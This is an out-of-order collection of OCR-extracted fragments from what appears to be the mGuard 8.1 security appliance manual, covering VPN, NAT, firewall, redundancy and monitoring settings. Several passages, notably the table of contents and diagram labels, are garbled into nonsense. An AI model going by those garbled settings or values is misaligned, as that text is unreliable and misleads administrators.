123. Guard devices for the machine controllers initiate VPN data traffic to the maintenance center and encapsulate the data packets sent to it ontroller ee machine Machi As soon as a connection is initiated the maintenance cen ces onthe a ter also automatically encapsulates the data packets sent Guard dev controller 1 to the relevant VPN partner aated PY Machine a controller 2 center Machine controller 3 Maintenance center mGuard mGuard on machine controllers Required basic settings Required basic settings IPsec VPN menu item Global Options tab IPsec VPN menu item Global Options tab page page Listen for incoming VPN connections which are encapsulated No Connections submenu General tab page Address of the partner s VPN gateway Fixed IP address or host name Connection startup Initiate or Initiate on traffic Encapsulate the VPN traffic in TCP Yes Listen for incoming VPN connections which are encapsulated Yes Connections submenu General tab page Address of the partner s VPN gateway any Connection startup Wait Figure 10 1 TCP encapsulation in an application scenario with a maintenance center and machines maintained remotely via VPN connections IPsec VPN gt gt Global gt gt Options TCP Encapsulation Listen for incoming Default setting No Only set this option to Yes if the TCP En VPN connections capsulation function is used Only then can the mGuard allow which are encapsu
124. Guard industrial rs mGuard blade mGuard delta mGuard delta EAGLE mGuard see Secondary External Interface on page 116 154 Innominate Security Technologies 105661_en_02 Network menu 6 3 2 IP and Port Forwarding Masquerading IP and Port Forwarding IP and Port Forwarding Log ID Sw porttorwarding N 240 3 10 3643 1 4 0 035S 0000D2050090 SX A _imcoming on port RedirecttoiP Redirect to Port p 1 TCP v 0 0 0 0 0 any extern http 127 0 0 1 http No wv Network gt gt NAT gt gt IP and Port Forwarding IP and Port Forwarding Lists the rules defined for port forwarding DNAT Destination NAT Port forwarding performs the following the headers of incoming data packets from the ex ternal network which are addressed to the external IP address or one of the external IP addresses of the mGuard and to a specific port of the mGuard are rewritten in order to forward them to a specific computer in the internal network and to a specific port on this computer In other words the IP address and port number in the header of incoming data packets are changed This method is also referred to as Destination NAT Port forwarding cannot be used for connections initiated via the External 2 interface l External 2 is only for devices with a serial interface The rules defined here have priority over the settings made under Network Security gt gt Packet Filter gt gt Incoming Rules Protocol Specify the protoc
125. Guard rs4000 3G mGuard rs4000 and mGuard industrial rs only If a VPN connection is controlled via a VPN switch then VPN redundancy cannot be activated See under IPsec VPN gt gt Global gt gt Options gt gt VPN Switch During VPN state synchronization the state of the VPN connection is sent continuously from the active mGuard to the one on standby so that it always has an up to date copy in the event of errors The only exception is the state of the IPsec replay window Changes there are only transmitted sporadically The volume of the data traffic for state synchronization does not depend on the data traffic sent over the VPN channels The data volumes for state synchronization are defined by a range of parameters that are assigned to the ISAKMP SAs and IPsec SAs 16 2 6 Handling VPN redundancy in extreme situations The conditions listed under Handling firewall redundancy in extreme situations on page 338 also apply to VPN redundancy They also apply when the mGuard is used exclusively for forwarding VPN connections The mGuard forwards the data flows via the VPN channels and rejects incorrect packets regardless of whether firewall rules have been defined for the VPN connections or not An error interrupts the flow of data traffic An error that interrupts the data traffic running via the VPN channels represents an extreme situation In this case the IPsec data traffic is briefly vulnerable to replay attacks A replay
126. IP address 192 168 11 3 192 168 11 4 192 168 11 5 192 168 11 6 192 168 11 7 Subnet mask 255 255 255 0 255 255 255 0 255 255 255 0 255 255 255 0 255 255 255 0 Network B Computer B4 Additional internal routes IP address 192 168 15 2 192 168 15 3 192 168 15 4 192 168 15 5 Network 192 168 15 0 24 Subnet mask 255 255 255 0 255 255 255 0 255 255 255 0 255 255 255 0 f Gateway 192 168 11 2 NetworkC Computer C4 Nenware IP address 192 168 27 1 192 168 27 2 192 168 27 3 192 168 27 4 192 168 27 0 24 Gateway Subnet mask 255 255 255 0 255 255 255 0 255 255 255 0 255 255 255 0 192 168 11 2 105661_en_02 Innominate Security Technologies 25 mGuard 8 1 26 Innominate Security Technologies 105661_en_02 Changes compared to the previous version 3 Changes compared to the previous version 3 1 Overview of modifications in version 8 1 The following functions have been added to firmware Version 8 1 User firewall in VPN connections Dynamic activation of the firewall rules Function extension of the service contacts OPC Inspector for Deep Packet Inspection for OPC Classic Extended DynDNS providers New mode for Pre Shared Secret authentication method Onthe web interface dynamic modifications are displayed in red Detailed logging of modems 3 1 1 User firewall in VPN connections The user firewall can be used within VPN connections A VPN connection in which t
127. MAC filter is applied to frames that the mGuard receives at the WAN inter face The Outgoing MAC filter is applied to frames that the mGuard receives at the LAN interface Data packets that are received or sent via a modem connection on models with a serial interface are not picked up by the MAC filter because the Ethernet protocol is not used here In Stealth mode in addition to the packet filter Layer 3 4 that filters data traffic e g ac cording to ICMP messages or TCP UDP connections a MAC filter Layer 2 can also be set A MAC filter Layer 2 filters according to MAC addresses and Ethernet protocols In contrast to the packet filter the MAC filter is stateless If rules are introduced correspond ing rules must also be created for the opposite direction If no rules are set all ARP and IP packets are allowed to pass through When setting MAC filter rules please note the information displayed on the screen The rules defined here have priority over packet filter rules The MAC filter does not support logging Network Security gt gt Packet Filter gt gt MAC Filtering Incoming Source MAC Specification of the source MAC address XX XX XX XX XX XX stands for all MAC addresses Destination MAC Specification of the destination MAC address XX XX XX XX XX XX Stands for all MAC addresses ff ff ff ff ff ff stands for the broadcast MAC address to which all ARP re quests for example are sent Ethernet Protocol Y
128. MD 1 3 lf starting and stopping the VPN connection via the CMD contact is enabled only the CMD con tact is authorized to do this i e this means that setting this option to Enabled for the entire VPN connection has no effect However if a button is connected to the CMD con tact instead of a switch see below the connec tion can also be established and disconnected using the CGI script command nph vpn cgi or via a text message which has the same rights If a VPN connection is controlled via a VPN switch then VPN redundancy cannot be acti vated 105661_en_02 IPsec VPN gt gt Connections gt gt Edit gt gt General Use inverted control logic Deactivation Timeout Token for text mes sage trigger Encapsulate the VPN traffic in TCP TCP Port of the server which accepts the encapsulated connec tion Only visible if Encapsulate the VPN traffic in TCP is set to Yes IPsec VPN menu Inverts the behavior of the connected switch If the switching service input is configured as an on off switch it can activate one VPN connection and deactivate another Time after which the VPN connection is deactivated if it has been started via a text message switch button nph vpn cgi or the web interface VPN connections which have been start ed by an explicit request via an application are not affected Time in minutes O to 10000 approx 1 week O means the setting is switched off
129. Mail Make sure that the e mail set Sender address of e mail notifications tings for the mGuard are cor Address of the e mail rectly configured server E Mail notifications Port number of the e mail server Encryption mode for the e mail server SMTP Login name SMTP Password Change notification for A Fis contact your support sta E mail address which is displayed as the sender from mGuard Address of the e mail server Port number of the e mail server No Encryption TLS Encryption TLS Encryption with StartTLS Encryption mode for the e mail server User name Password for the e mail server Any e mail recipients can be linked with predefined events and a freely definable mes sage The list is processed from top to bottom E Mail recipient Event Selector 52 Innominate Security Technologies Specifies the e mail address When the selected event occurs or the event is configured for the first time the linked recipient address is selected and the event is sent to them via e mail An e mail message can also be stored and sent Some of the events listed depend on the hardware used A complete list of all events can be found at Event table on page 53 A configured VPN connection can be selected here which is monitored via e mail 105661_en_02 Management menu Management gt gt System Settings gt gt E Mail E Mail Subject Text appears in the subject line of the e mail
130. Network gt gt Interfaces gt gt General Router network mode static router mode IP of default gateway The IP address of a device in the local network connected to the LAN port or the IP address of a device in the external net work connected to the WAN port can be specified here if the mGuard establishes the transition to the Internet this IP address is assigned by the Internet service provider ISP If the mGuard is used within the LAN the IP address of the de fault gateway is assigned by the network administrator If the local network is not known to the external router e g in the event of configuration via DHCP specify your local network under Network gt gt NAT see Page 152 DMZ Networks See DMZ Networks on page 124 Internal Networks See Internal Networks on page 123 Secondary External Inter See Secondary External Interface on page 116 face Router network mode DHCP router mode Network Interfaces General Ethernet Dial out Dial in Modem Console Network Status External IP address 172 16 66 49 Active Defaultroute 172 16 66 18 Used DNS servers 10 1 0 253 Network Mode Network Mode Router w Router Mode DHCP w There are no additional setting options for Router network mode DHCP router mode Network gt gt Interfaces gt gt General Router network mode DHCP router mode Internal Networks See Intern
131. PoE PPTP Mo dem Built in Modem Built in mobile network modem and Stealth only multiple clients in Stealth mode Modem Built in modem Built in mobile network modem is not available for all mGuard models see Network gt gt In terfaces on page 105 For IP connections via a VPN connection with active masquerading the firewall rules for outgoing data in the VPN connection are used for the original source address of the con nection 105661_en_02 Innominate Security Technologies 267 mGuard 8 1 1 1 NAT With 1 1 NAT in VPN itis still possible to enter the network addresses actually used to spec ify the tunnel beginning and end independently of the tunnel parameters agreed with the partner Remote network Local network ESTEN IPsec tunnel maa najm Bo W C 93 Internet network address for 1 1 NAT FN bs a Network address for re mote 1 1 NAT mM Figure 10 3 1 1 NAT 105661_en_02 268 Innominate Security Technologies IPsec VPN menu 10 2 3 Authentication IPsec VPN Connections Mannheim Leipzig General Authentication Firewall IKE Options Authentication Authentication method X 509 Certificate v Local X 509 Certificate VPN Endpunkt Kundendienst MA w Remote CA Certificate No CA certificate but the Remote Certificate below w Remote Certificate Subject CN VPN Endpunkt Maschine 06 L L O Beispiel Lieferant C
132. PoE PPTP Modem mode are as follows P address 192 168 1 1 Netmask 255 255 255 0 You can also specify other addresses via which the mGuard can be accessed by devices in the locally connected network For example this can be useful if the locally connected net work is divided into subnetworks Multiple devices in different subnetworks can then access the mGuard via different ad dresses IP IP address via which the mGuard can be accessed via its LAN port Netmask The subnet mask of the network connected to the LAN port Use VLAN If the IP address should be within a VLAN set this option to Yes 105661_en_02 Innominate Security Technologies 123 mGuard 8 1 Network gt gt Interfaces gt gt General Router network mode VLAN ID Additional Internal Routes Network Gateway DMZ Networks DMZ IPs Only available with the mGuard rs4000 3G with inter nal switch Netmask Additional DMZ Routes Network Gateway AVLAN ID between 1 and 4095 Foran explanation of the term VLAN please refer to the glossary on page 364 If you want to delete entries from the list please note that the first entry cannot be deleted Additional routes can be defined if further subnetworks are connected to the locally connected network Specify the network in CIDR format see CIDR Classless Inter Domain Routing on page 24 The gateway via which this network can be accessed
133. S Antivirus Scan Connector The references to the network drives can be set as follows For CIFS integrity checking see Checked CIFS Share on page 234 For CIFS Antivirus Scan Connector see CIFS Antivirus Scan Connector on page 242 9 1 1 Importable Shares CIFS Integrity Monitoring Importable Shares Importable Shares Importable CIFS Shares Here you can specify the CIFS shares to which the mGuard has access AX F F semer sare o o aon CIFS Integrity Monitoring gt gt Importable Shares Importable CIFS Shares Name Name of the network drive to be checked Internal name used in the configuration Server IP address of the authorizing server CIFS Share Name of the network drive made available by the authorizing server Click on Edit to make the settings 230 Innominate Security Technologies 105661_en_02 CIFS Integrity Monitoring menu CIFS Integrity Monitoring Importable Shares System32 Importable Share Identification for Reference Name System32 Location of the Importable Share IP address ofthe server 192 168 1 10 Imported share s name System32 Authentication for mounting the Share Domain Workgroup WORKGROUP NetBIOS name Windows 98 only CIFS Integrity Monitoring gt gt Importable Shares gt gt Edit Identification for Reference Name Location of the importable IP address of the share server Imported share s name Authentication for mount D
134. S Mode User defined name servers 122 Innominate Security Technologies Specifies how many sequentially performed test runs must re turn a negative result before the mGuard activates the sec ondary external interface The result of a test run is negative if none of the ping tests it contains were successful The number specified here also indicates how many consec utive test runs must be successful after the secondary external interface has been activated before this interface is deacti vated again Only relevant if the secondary external interface is activated in temporary mode The DNS mode selected here specifies which DNS server the mGuard uses for temporary connections established via the secondary external interface Use primary DNS settings untouched DNS Root Servers Provider defined via PPP dial up User defined from field below Use primary DNS settings untouched The DNS servers defined under Network gt DNS Server see Network gt gt NAT on page 152 are used DNS Root Servers Requests are sent to the root name servers on the Internet whose IP addresses are stored on the mGuard These ad dresses rarely change Provider defined via PPP dial up The domain name servers of the Internet service provider that provide access to the Internet are used User defined from field below If this setting is selected the mGuard will connect to the do main name servers listed un
135. S SA ete cr tcc te cea tec teenth ce eee een ae nated Gece ete eee aaa 357 105661_en_02 Innominate Security Technologies 9 mGuard 8 1 10 Innominate Security Technologies 105661_en_02 mGuard basics 1 mGuard basics The mGuard protects IP data links by combining the following functions Network features Firewall features Anti virus features 105661_en_02 VPN router VPN Virtual Private Network for secure data transmission via public net works hardware based DES 3DES and AES encryption IPsec protocol Configurable firewall for protection against unauthorized access The dynamic packet filter inspects data packets using the source and destination address and blocks unde sired data traffic Network card mGuard pci SD mGuard pcie SD mGuard pci switch mGuard delta mGuard rs4000 rs2000 3G 3G mobile phone and dedicated DMZ port mGuard rs4000 3G Basic properties of the mGuards Stealth auto static multi router static DHCP client PPPoE for DSL PPTP for DSL and modem VLAN DHCP server relay on the internal and external network interfaces DNS cache on the internal network interface Administration via HTTPS and SSH Optional conversion of DSCP TOS values Quality of Service Quality of Service QoS LLDP MAU management SNMP Stateful packet inspection Anti spoofing IP filter L2 filter only in stealth mode NAT with FTP IRC and PPTP support only in router modes
136. SIM1 and SIM2 light up green when the SIM card is active If a PIN has not been entered the LED flashes green Quality of the mobile network connection The signal strength of the mobile network connection is indicated by three LEDs on the front of the mGuard rs4000 rs2000 3G The LEDs function as a bar graph Table 6 1 LED indication of signal strength LED 1 LED 2 LED 3 Signal strength Lower LED Middle LED Upper LED Off Off Off 113 dBm 111 dBm Extremely poor to no network reception Off Off 109 dBm 89 dBm Adequate network reception Off 87 dBm 67 dBm Good network reception 65 dBm 51 dBm Very good network reception For stable data transmission we recommend at least good network reception If the network reception is only adequate only text messages can be sent and received In the case of the mGuard rs2000 3G the WAN is only available via the mobile network as a WAN interface is not available The mobile network function is preset The mGuard rs2000 3G can only be operated in router mode 168 Innominate Security Technologies 105661_en_02 105661 _en_02 Network menu The status of the mobile network connection can be queried via SNMP SNMP traps are sent in the following cases Incoming text message Incoming call Mobile network connection error You can switch SNMP support on and off under Management gt gt SNMP You can increase the amount of detail shown per entry in the log file
137. See also Network example diagram on page 25 IP address via which the mGuard can be accessed by devices in the network connected to the DMZ port The default settings in Router PPPoE PPTP Modem mode are as follows P address 192 168 3 1 Netmask 255 255 255 0 You can also specify other addresses via which the mGuard can be accessed by devices in the networks connected to the DMZ port For example this can be useful if the network con nected to the DMZ port is divided into subnetworks Multiple devices in different subnetworks can then access the mGuard via different addresses IP address via which the mGuard can be accessed via its DMZ port Default 192 168 3 1 The subnet mask of the network connected to the DMZ port Default 255 255 255 0 Additional routes can be defined if further subnetworks are connected to the DMZ Specify the network in CIDR format see CIDR Classless Inter Domain Routing on page 24 Default 192 168 3 0 24 The gateway via which this network can be accessed See also Network example diagram on page 25 Default 192 168 3 254 Secondary External Inter See Secondary External Interface on page 116 face 124 Innominate Security Technologies 105661_en_02 Network menu Router network mode static router mode Network Interfaces General Dial out Dial in Modem Console Network Status Secondary not in use Active Defaul
138. Sub ject field The entry is comprised of several attributes These attributes are either expressed as an object identifier e g 132 3 7 32 1 or more commonly as an abbreviation with a corresponding value Example CN John Smith O Smith and Co C US If certain subject attributes have very specific values for the acceptance of the browser by the mGuard then these must be specified accordingly The values of the other freely select able attributes are entered using the asterisk wildcard Example CN O C US with or without spaces between attributes In this example the attribute C US must be entered in the certificate under Subject It is only then that the mGuard would accept the certificate owner Subject as a communica tion partner The other attributes in the certificates to be fil tered can have any value If a subject filter is set the number but not the or der of the specified attributes must correspond to that of the certificates for which the filter is to be used Please note that the filter is case sensitive a Several filters can be set and their sequence is irrel evant With HTTPS the browser of the accessing user does not specify which user or administration rights it is using to log in These access rights are assigned by setting filters here under Authorized for access as This has the following result if there are several filters that let through a certa
139. Switch type connected to the Current state VPN connections controlled by this input Firewall rule records controlled by this input Output ACK 1 Monitor VPN connection or Firewall rule record Input CMD 2 Switch type connected to the Current state VPN connections controlled by this input Firewall rule records controlled by this input Output ACK 2 Monitor VPN connection or Firewall rule record Input CMD 3 Switch type connected to the input Current state VPN connections controlled by this input Firewall rule records controlled by this input Management gt gt Service I O gt gt Service I O Input CMD 1 3 to the input Current state 96 Innominate Security Technologies Push button v Service input CMD 1 deactivated off v Push button Service input CMD 2 deactivated off v Push button v Service input CMD 3 deactivated Switch type connected Push button or on off switch Select the type of switch connected Displays the state of the connected switch When editing the VPN connection the switch must be se lected under Controlling service input under IPsec VPN gt gt Connections gt gt Edit gt gt General 105661 _en_02 Management gt gt Service I O gt gt Service I O Output ACK 1 2 105661_en_02 VPN connections con trolled by this input Firewall rule records controlled by this input Monitor VPN connec tions or Firewall rule rec
140. TEE ENE TEET EE EAS 67 4 3 3 Terms Of LICENSE annn a N 69 4 3 4 Management gt gt Update 0 cee cccccseeeeeneseeeeeeenseeeceeaereeseaseeeeseueeeeens 70 4 3 5 OVENI toare a eet eel 70 4 3 6 Vodil asan A S 71 105661_en_02 Table of contents Innominate Security Technologies 5 mGuard 8 1 5 6 4 4 4 5 4 6 4 7 4 8 Blade Control menu Network meni 5 6 2 6 3 6 4 6 5 6 6 6 7 Innominate Security Technologies Management gt gt Configuration Profiles ccccceeeceeeeeeeeeeeeeeeeeeeeeeeaaeeeeeeeesaaaees 74 4 4 1 COMMIGUFAUON Prole esns stunned a aman 74 Management Ss ONMP iin r a E a thoes 79 4 5 1 QUE cine Sersets esate eccnctciret a a sete Raneretdeedwaceeamals 79 4 5 2 PAD ciara a E E e late 83 4 5 3 LEDES ee teeters eee eee eee eee 90 Management gt gt Central Manageme nt cccceeeeeeeeeeeeeeeeeeeeeeeeeeesaeeeeeeeeesaaeees 91 4 6 1 COMMOUAT ONS PUN areeegeregtee sitet a a d Brvaecban Qua caatty 91 Management gt gt Service W O caricia ee hens ee 95 4 7 1 SOIVICS Oscars ess scan senate cai os eal eae E 96 4 7 2 Alamot UM ce cs eccncnatacbaasratesechanstens ceacecearsecanneneeSentansatceaae lt aaaaccetuieacesascese 98 Management gt gt ReStalt ccccccesseccceeeseecceesseeceeeeceeeceeeeessaeeeessseeesseaeeeesees 100 4 8 1 PAC Slabs etasitanc E duet auainens E ttc 100 PEETI E EENE AE aa ea secre AN Magee eee peewee A E 101 Blade
141. The text is freely definable You can use blocks from the events table which can be inserted as wildcards in plain text A and V or in machine readable form a and v E Mail Message Here you can enter the text that is sent as the e mail body The text is freely definable You can use blocks from the events table which can be inserted as wildcards in plain text A and V or in machine readable form a and v Table 4 1 Event table State of the External Con Not present ecs status Present and in sync eC Validity of the positional gps valid he O oOo incoming call Telephone number and ee gsm incoming_sms Oo message of an incoming text message unknown a 2 no ye Roaming state of the mo gsm roaming Registration state to the gsm service Currently selected SIM gsm selected_sim 1 oon Mobile network fallback gsm sim_fallback aooo E E Lye Mobile network probes gsm network_probe S S unknown S S 105661_en_02 Innominate Security Technologies 53 mGuard 8 1 Table 4 1 Event table Machine readable State of the Alarm output Alarm output closed OK inal contact close Alarm output is open FAILURE open Reason for activating the Alarm output ihal contactreason No alarm No network link on external interface link_ext No network link on internal interface link_int Power supply 1 out of order psu Power supply 2 out of order psu2 Board temperature exceeding configured bounds temp Redu
142. _02 Innominate Security Technologies 15 mGuard 8 1 1 2 5 WLAN via VPN WLAN via VPN is used to connect two company buildings via a WLAN path protected using IPsec The annex should also be able to use the Internet connection of the main building A Ege 89L 6L N a ue N op MIN 60 N D D on gt D a gt e O Gess 192 168 2 0 24 192 168 1 0 24 Figure 1 5 WLAN via VPN In this example the mGuard devices were set to router mode and a separate network with 172 16 1 x addresses was set up for the WLAN To provide the annex with an Internet connection via the VPN a default route is set up via the VPN Tunnel configuration in the annex Connection type Tunnel network lt gt network Address of the local network 192 168 2 0 24 Address of the remote network 0 0 0 0 0 In the main building the corresponding counterpart is configured Tunnel configuration in the main building Connection type Tunnel network lt gt network Local network 0 0 0 0 Address of the remote network 192 168 2 0 24 The default route of an mGuard usually uses the WAN port However in this case the Inter net can be accessed via the LAN port
143. _02 Innominate Security Technologies 327 m Guard 8 1 15 1 3 DNS Lookup Support Tools PingCheck Traceroute DNSLookup IKEPing DNS Lookup Hostname myServer Support gt gt Tools gt gt DNS Lookup DNS Lookup Aim to determine which host name belongs to a specific IP address or which IP address belongs to a specific host name Procedure e Enter the IP address or host name in the Hostname field e Click on Lookup The response which is determined by the mGuard according to the DNS configura tion is then returned 15 1 4 IKE Ping Ping Check Traceroute DNS Lookup IKE Ping IKE Ping Hostname IP Address myServer sss Support gt gt Tools gt gt IKE Ping IKE Ping Aim to determine whether the VPN software for a VPN gateway is able to establish a VPN connection or whether a firewall prevents this for example Procedure e Enter the name or IP address of the VPN gateway in the Hostname IP Address field e Click on Ping e A corresponding message is then displayed 328 Innominate Security Technologies 105661_en_02 105661 _en_02 15 2 Support gt gt Advanced 15 2 1 Hardware This page lists various hardware properties of the mGuard Support Advanced Hardware Snapshot Hardware Information Hardware CPU CPU Family CPU Stepping CPU Clock Speed System Temperature System Uptime User Space Memory MAC 1 MAC 2 MAC 3 MAC 4 Product Nam
144. a aa a wee a 320 13 3 1 Ring Network Coupling cccccsecccccssseeeceesseecceeseeeeseeseeeseeaeeeeessaeeees 320 E EANA EA E TE aut E E AA EE EA E A AES EAE E 321 Logging gt gt Settings arira a ena a eels 321 TAi SENGS ane rete E tere rrr arerre cre eres reer 321 Logging gt Browse local OOS airsan oa a a veers 323 14 21 iEogenty categories 4 i viens chivekinasvadeviczantuss ves svemnacdinedaiaaiddaxeuceteediaes eens 324 105661_en_02 Table of contents toe SUPPO MENU lmmmerener tet steme erent ee ater E er ee ene re 327 15 1 SUD DOM TOO S eee act ste seen a A a a EAEE A 327 ISTA PING GHECK jizs 0se2sssicssades thet a a TE 327 ISk ONT AC CTOUNCY sa a De eostiontstetbuty ved E 327 IERS DNS LOOKUP i vreden hs eet es eee a es ce alt 328 TOA UKE PNO serena na amen reuenctetuecneorcete 328 152 OUDDO Advances eie a R 329 1521 Hardware siracusa a a TEE 329 T522 Snaps IO merene ated ane eaeeetrnccte la mnati uc achig senieeeddenaeemae noes 329 16 RECdUNGANCY siyonnen a a mies gebenttas eae tuededs 331 16 1 Firewall redundancy resiiciennnnn nnna aa dea aA AS R 331 16 1 1 Components in firewall redundancy cccccsseeeeesseeeeeeneeeeeesaaeeess 332 16 1 2 Interaction of the firewall redundancy components 0 ccecsseeeees 334 16 1 3 Firewall redundancy settings from previous versions cccceeeeees 334 16 1 4 Requirements for firewall redundancy ccccssseeeeceeeeeeeeeee
145. able interfaces must be defined on this page under Allowed Networks in order to specify differentiated access and moni toring options on the mGuard Port for incoming Default 161 SNMP connections If this port number is changed the new port number only ap plies for access via the External External 2 VPN and Dial in interface Port number 161 still applies for internal access The remote partner that implements remote access may have to specify the port number defined here during entry of the ad dress SNMPv1 v2 Community Read Write Commu Enter the required login data in this field nity Read Only Community Enter the required login data in this field 80 Innominate Security Technologies 105661_en_02 Management menu Management gt gt SNMP gt gt Query Allowed Networks Lists the firewall rules that have been set up These apply for incoming data packets of an SNMP access attempt The rules specified here only take effect if Enable SNMPv3 access or Enable SNMPv1 v2 access is set to Yes If multiple firewall rules are defined these are queried starting from the top of the list of entries until an appropriate rule is found This rule is then applied If the list of rules con tains further subsequent rules that could also apply these rules are ignored From IP Enter the address of the computer or network from which re mote access is permitted or forbidden in this field The following options are available
146. acters e g c is not permitted Example Name exe refers to all files with the extension exe that are located in the Name directory and any subdi rectories Innominate Security Technologies 105661_en_02 CIFS Integrity Monitoring menu CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Set of Filename Patterns gt gt Edit 105661_en_02 Include in check Missing files trigger an alarm Missing files are files that were present during initialization An alarm is also triggered if additional files are present Include the files are included in the check Each file name is compared with the samples one after the other The first hit determines whether the file is to be included in the integrity check The file is not included if no hits are found Exclude the files are excluded from the check Innominate Security Technologies 241 m Guard 8 1 9 3 CIFS Integrity Monitoring gt gt CIFS AV Scan Con nector a In Stealth network mode without management IP address the CIFS server for the anti vi rus scan is not supported CIFS Antivirus Scan Con The CIFS Antivirus Scan Connector enables the mGuard to perform a virus scan on nector drives that are otherwise not externally accessible e g production cells The mGuard mir rors a drive externally in order to perform the virus scan Additional anti virus software is re quired for this procedure Set the necessary read
147. activate the L2TP server and make the following entries in the fields specified below Type Transport Protocol UDP Local all Remote all PFS No Perfect Forward Secrecy PFS on page 281 Specifying a default route over the VPN Address 0 0 0 0 0 specifies a default route over the VPN With this address all data traffic where no other tunnel or route exists is routed through this VPN tunnel A default route over the VPN should only be specified for a single tunnel a In Stealth mode a default route over the VPN cannot be used Option following installation of a VPN tunnel group license lf Address of the remote site s VPN gateway is specified as any it is possible that there are many mGuard devices or many networks on the remote side A very large address area is then specified in the Remote field for the local mGuard A part of this address area is used on the remote mGuard devices for the network specified for each of them under Local This is illustrated as follows the entries in the Local and Remote fields for the local and re mote mGuard devices could be made as follows Local mGuard Remote mGuard A Local Remote Local Remote 10 0 0 0 8 10 0 0 0 8 gt 10 1 7 0 24 10 0 0 0 8 Remote mGuard B Local Remote gt 10 3 9 0 24 10 0 0 0 8 Etc In this way by configuring a single tunnel you can establish connections for a number of peers To use this option the VPN tunnel group
148. addi tional serial interface for the connected computer through the USB interface The serial interface can be accessed on the computer using a terminal program The mGuard smart pro vides a console through the serial interface which can then be used in the terminal program Windows requires a special driver This can be directly down loaded from the mGuard The relevant link is located on the right hand side next to the Serial console via USB drop down menu Off On When set to On flow is controlled by means of RTS and CTS signals for PPP connections Default 57600 Transmission speed for communication between the mGuard and modem via the serial connecting cable between both de vices This value should be set to the highest value supported by the modem If the value is set lower than the maximum possible speed that the modem can reach on the telephone line the telephone line will not be used to its full potential Yes No If the external modem is used for dial in see Page 136 Yes means that the mGuard does not initialize the modem The subsequently configured modem initialization sequence is not observed Thus either a modem is connected which can an swer Calls itself default profile of the modem contains auto answer or a null modem cable to a computer can be used in stead of the modem and PPP protocol is used over this Specifies the initialization sequence that the mGuard sends to the connected mo
149. address and subnet mask of the VLAN port If the IP address should be within a VLAN set this option to Yes VLAN ID This option only applies if you set the Stealth configuration option to multiple clients AVLAN ID between 1 and 4095 An explanation can be found under VLAN on page 364 If you want to delete entries from the list please note that the first entry cannot be deleted In multi stealth mode the external DHCP server of the mGuard cannot be used if a VLAN ID is as signed as the management IP Default gateway The default gateway of the network where the mGuard is lo cated In Stealth modes autodetect and static the mGuard adopts the default gateway of the computer connected to its LAN port This does not apply if a management IP address is configured with the default gateway Alternative routes can be specified for data packets destined for the WAN that have been created by the mGuard These include the packets from the following types of data traffic Download of certificate revocation lists CRLs Download of a new configuration Communication with an NTP server for time synchronization Sending and receiving encrypted data packets from VPN connections Requests to DNS servers Syslog messages Download of firmware updates Download of configuration profiles from a central server if configured SNMP traps Innominate Security Technologies 115 mGuard 8 1 N
150. ailable Therefore after updating the system to a new minor release press this button again until you receive the message that there is no newer update available instal the next major release uoo oo Xy z Note It might be possible that there is no direct update from the currently installed version to the next major release available Therefore execute the minor release update first and repeat this step until you receive the message that there is no newer minor release available Then install the next major release Update Servers F https w update innominate com No v NOTE Do not interrupt the power supply to the mGuard during the update process Oth erwise the device could be damaged and may have to be reactivated by the manufactur er Innominate Security Technologies 71 mGuard 8 1 Depending on the size of the update the process may take several minutes With mGuard firmware Version 5 0 0 or later a license must be obtained for the relevant device before a major release upgrade e g from Version 5 x y to Version 6 x y or from Version 6 x y to Version 7 x y can be installed a A message is displayed if a restart is required after completion of the update The license must be installed on the device before updating the firmware see Manage ment gt gt Licensing on page 67 and Install on page 67 Minor release upgrades i e the Same major version e g within Version 7 x y can be installed with
151. al Networks on page 123 Secondary External Inter See Secondary External Interface on page 116 face 126 Innominate Security Technologies 105661_en_02 Network menu Router network mode PPPoE router mode Network Interfaces General Ethernet Dial out Dial in Modem Console Network Status External IP address 172 16 66 49 Active Defaultroute 172 16 66 18 Used DNS servers 10 1 0 253 Network Mode Network Mode Router w Router Mode PPPoE w PPPoE PPPoE Login user provider example n PPPoE Password When Router is se lected as the net MEE o v work mode and PP PoE is selected as the router mode PPPoE Service Name Automatic Re connect No w Re connect daily at 0 h 0 m Network gt gt Interfaces gt gt General Router network mode PPPoE router mode PPPoE For access to the Internet the Internet service provider ISP provides the user with a user name login and password These are requested when you attempt to establish a connection to the Internet PPPoE Login The user name login that is required by the Internet service provider ISP when you attempt to establish a connection to the Internet PPPoE Password The password that is required by the Internet service provider when you attempt to establish a connection to the Internet Request PPPoE Ser When Yes is selected the PPPoE client of the mGuard re vice Name quests the service name specified below
152. al tab page see Network gt gt Interfaces on page 105 and on page 106 In this case data traffic is not processed via the WAN port Ethernet interface but via this modem As a secondary external interface if Secondary External Interface is activated and Built in Modem is selected under Network gt gt Interfaces on the General tab page see Network gt gt Interfaces on page 105 and on page 106 In this case data traffic is also processed via the serial interface For the PPP dial in option see Options for using the serial interface on page 139 Please note that the serial interface of the device also provides similar options for use see above Therefore on an mGuard industrial rs with a built in modem normal data traffic can be routed via a modem connection Modem network mode and a second modem connec tion can be used simultaneously for the PPP dial in option for example Innominate Security Technologies 145 mGuard 8 1 For the mGuard industrial rs with built in modem External Modem Hardware handshake Risers OC Y Baudrate 57600 Handle modem transparently for dial in only S Y Modem init sting d dATH OK Built in Modem analog Additionally for the CAR Germany Ext i i A mGuard industrial rs se with built in modem an Speaker volume builtin speaker a O g Speaker control built in speaker Speaker is on during call establishment but off when receiving carr
153. algorithm must be replaced by SHA 1 Allows VPN connections to the mGuard to be established using the IPsec L2TP protocol In doing so the L2TP protocol is driven using an IPsec transport connection in order to es tablish a tunnel connection to a Point to Point Protocol PPP Clients are automatically as signed IP addresses by the PPP In order to use IPsec L2TP the L2TP server must be activated and one or more IPsec con nections with the following properties must be defined Type Transport Protocol UDP Local all Remote all PFS No see IPsec VPN gt gt Connections gt gt Edit gt gt General on Page 257 IPsec VPN gt gt Connections gt gt Edit gt gt IKE Options Perfect Forward Secrecy PFS on Page 281 10 3 1 L2TP Server IPsec VPH LITP over IPsec L2TP Server Settings Start LeTP Server for Psec LeTP Wes w Local IP for L2TP connections 10 106 106 1 Remote IF range stat 910 106 1062 IF range end 10 106 106 254 Please note These settings dont apply to the Stealth mode Status VPN Name index Remote Gateway Local IP Address Remote IP Address IPsec VPN gt gt L2TP over IPsec gt gt L2TP Server Settings Start L2TP Server for If you want to enable IPsec L2TP connections set this option IPsec L2TP to Yes It is then possible to establish L2TP connections to the mGuard via IPsec which dynamically assign IP addresses to the clients with
